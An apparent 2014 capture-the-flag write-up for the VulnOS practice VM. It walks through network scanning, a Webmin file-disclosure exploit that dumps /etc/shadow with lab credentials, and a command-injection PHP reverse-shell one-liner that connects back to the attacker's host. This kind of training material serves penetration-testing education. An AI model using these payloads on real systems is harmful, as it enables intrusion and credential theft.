VulnOS Write-up

Apr 8, 2014 in VULNHUB • WRITE-UP
6 min read

This contains the solution of the VM: VulnOS.

This is my first write-up for a VM and I’m doing it for VulnOS which is hosted on VulnHub (Great resource if you want to improve your pentesting skills).

In this ’tutorial’, I’m gonna give you the steps I reproduced to get a shell on the machine.

Discovery

First, start by scanning the network to discover where’s the host.

nmap -sV 192.168.56.1/24

Starting Nmap 6.41SVN ( http://nmap.org ) at 2014-04-08 21:23 CEST
Nmap scan report for 192.168.56.1
Host is up (0.00049s latency).
Nmap scan report for 192.168.56.105
Host is up (0.00018s latency).

We managed to get the IP of the machine. Let’s do some fingerprinting.

Fingerprinting

I still used nmap to do this :

Port 80 and 8080 are open. I used nikto and DirBuster to do even more fingerprinting.

./nikto.pl -h http://192.168.56.105
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.105
+ Target Hostname:    192.168.56.105
+ Target Port:        80
+ Start Time:         2014-04-08 21:29:47 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.2.14 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 1062203, size: 745, mtime: 0x4f5c81e0490a0
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/2.2.14 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-3268: /imgs/: Directory indexing found.
+ OSVDB-3092: /imgs/: This might be interesting...
+ Retrieved x-powered-by header: PHP/5.3.2-1ubuntu4.23
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3093: /.htaccess: Contains authorization information
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie 5d89dac18813e15aa2f75788275e3588 created without the httponly flag
+ /phpldapadmin/: Admin login page/section found.
+ Cookie PPA_ID created without the httponly flag
+ /phppgadmin/: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2014-04-08 21:30:08 (GMT2) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

I also used DirBuster to get some folders :

Starting OWASP DirBuster 0.12
Starting dir/file list based brute forcing
Dir found: /cgi-bin/ - 403
Dir found: / - 200
File found: /index2.html - 200
Dir found: /imgs/ - 200
Dir found: /icons/ - 200
Dir found: // - 200
Dir found: /icons/ - 200
File found: //index2.html - 200
Dir found: //imgs/ - 200
Dir found: /phpmyadmin/ - 200
Dir found: /phppgadmin/ - 200
File found: /phpmyadmin/Documentation.html - 200
Dir found: /phpmyadmin/themes/ - 403
Dir found: /phpsysinfo/ - 200
Dir found: /phpmyadmin/themes/original/ - 403
Dir found: /phpmyadmin/themes/original/img/ - 403
Dir found: /phpgroupware/ - 302
File found: /phpsysinfo/index.php - 200
File found: /phppgadmin/browser.php - 200
File found: /phppgadmin/intro.php - 200
File found: /phpmyadmin/index.php - 200
Dir found: /imgs/ - 200
Dir found: /phppgadmin/images/ - 403
Dir found: /phppgadmin/images/themes/ - 403
Dir found: /phppgadmin/images/themes/default/ - 403
Dir found: /phppgadmin/xloadtree/ - 403
File found: /phppgadmin/xloadtree/xtree2.js - 200
File found: /phppgadmin/xloadtree/xloadtree2.js - 200
File found: /phppgadmin/redirect.php - 200
File found: /phppgadmin/servers.php - 200
File found: /phpmyadmin/translators.html - 200
File found: /phpmyadmin/license.php - 200
File found: /phpmyadmin/changelog.php - 200
Dir found: /phpmyadmin/setup/ - 401
Dir found: /egroupware/ - 302
Dir found: /insecure/ - 200
File found: /insecure/LICENSE.txt - 200
File found: /insecure/ReadMe.html - 200
File found: /insecure/insecure.xml - 200
File found: /insecure/insecure.war - 200
Dir found: /mediawiki/ - 301
Dir found: // - 200
Dir found: /phpldapadmin/ - 200
File found: /phpldapadmin/index.php - 200
Dir found: /phpldapadmin/images/ - 403
File found: /phpldapadmin/cmd.php - 200
Dir found: /phpldapadmin/images/default/ - 200
Dir found: /phpldapadmin/js/ - 403
File found: /phpldapadmin/js/ajax_functions.js - 200
Dir found: /phpldapadmin/js/jscalendar/ - 403
File found: /phpldapadmin/js/jscalendar/calendar.js - 200
File found: /phpldapadmin/js/layersmenu-browser_detection.js - 200
File found: /phpldapadmin/js/ajax_tree.js - 200

On the port 8080, nothing much with DirBuster :

Starting dir/file list based brute forcing
Dir found: / - 200
Dir found: /docs/ - 200
Dir found: // - 200
Dir found: // - 200

And with Nikto:

./nikto.pl -h http://192.168.56.105:8080
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.105
+ Target Hostname:    192.168.56.105
+ Target Port:        8080
+ Start Time:         2014-04-08 21:55:59 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ Server leaks inodes via ETags, header found with file /, fields: 0xW/1887 0x1394395959000 
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS 
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ Cookie JSESSIONID created without the httponly flag
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager interface found
+ 6544 items checked: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2014-04-08 21:57:01 (GMT2) (62 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Thanks to the nmap scan, there are a lot of services which are available. I did lot of attempts to exploit MySQL, the IRC daemon, SMTP, .. but it didn’t work.

Then, I decided to check Webmin service.

Exploitation

To do so, I started to use Metasploit to see if there was relevant exploit. And there was one :

I decided to use auxiliary/admin/webmin/file_disclosure.

Using this flaw, I’ve been able to get /etc/shadow because we have root privileges.

root:*:16137:0:99999:7:::
daemon:*:16137:0:99999:7:::
bin:*:16137:0:99999:7:::
sys:*:16137:0:99999:7:::
sync:*:16137:0:99999:7:::
games:*:16137:0:99999:7:::
man:*:16137:0:99999:7:::
lp:*:16137:0:99999:7:::
mail:*:16137:0:99999:7:::
news:*:16137:0:99999:7:::
uucp:*:16137:0:99999:7:::
proxy:*:16137:0:99999:7:::
www-data:*:16137:0:99999:7:::
backup:*:16137:0:99999:7:::
list:*:16137:0:99999:7:::
irc:*:16137:0:99999:7:::
gnats:*:16137:0:99999:7:::
nobody:*:16137:0:99999:7:::
libuuid:!:16137:0:99999:7:::
syslog:*:16137:0:99999:7:::
landscape:*:16137:0:99999:7:::
vulnosadmin:$6$SLXu95CH$pVAdp447R4MEFKtHrWcDV7WIBuiP2Yp0NJTVPyg37K9U11SFuLena8p.xbnSVJFAeg1WO28ljNAPrlXaghLmo/:16137:0:99999:7:::
sysadmin:admin:16137:0:99999:7:::
webmin:webmin:16137:0:99999:7:::
hackme:hackme:16137:0:99999:7:::
sa:password1:16137:0:99999:7:::
stupiduser:stupiduser:16137:0:99999:7:::
messagebus:*:16137:0:99999:7:::
distccd:*:16137:0:99999:7:::
sshd:*:16138:0:99999:7:::
openldap:!:16138:0:99999:7:::
ftp:!:16138:0:99999:7:::
mysql:!:16138:0:99999:7:::
telnetd:*:16138:0:99999:7:::
bind:*:16138:0:99999:7:::
postgres:*:16138:0:99999:7:::
postfix:*:16138:0:99999:7:::
dovecot:*:16138:0:99999:7:::
tomcat6:*:16138:0:99999:7:::
statd:*:16138:0:99999:7:::
snmp:*:16138:0:99999:7:::
nagios:!:16140:0:99999:7:::
openerp:*:16140:0:99999:7:::

We can now use this and (try to) crack the password with John the ripper.

However, this hasn’t been successful for me. So, I decided to get Apache’s access logs. Thanks to this, I’ve been able to detect even more Web applications: MediaWiki, dolibarr-3.0.0, egroupware, And DVWA (Damn Vulnerable Web App)…

I also had access to all the files I wanted, so I gathered credentials for the database. It was then possible to login through the phpmyadmin pannel using: webmin/webmin.

And here is the output of the table user in Mysql database.

Access maintenance

I decided to check Damn Vulnerable Web App at the address : http://192.168.56.105/DVWA-1.0.8/ You can log in the page using the installation’s credentials : admin/password.

Then, disable “High” security and you can do Remote Command Execution. It’s time to get a reverse shell !

On your machine, type :

nc -lvp 1337

Because the Netcat version which is on the VM does not contain the -e option, I found a nice trick using PHP :

; php -r '$sock=fsockopen("192.168.56.101",1337);exec("/bin/sh -i <&3 >&3 2>&3");'

However, we don’t have enough access…

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Then, Thanks to D4rk, I created a cgi script in DVWA’s folder:

Using Webmin’s exploit, just change RPATH to the new file and exploit.

Hope you liked it and that you learnt something. :-)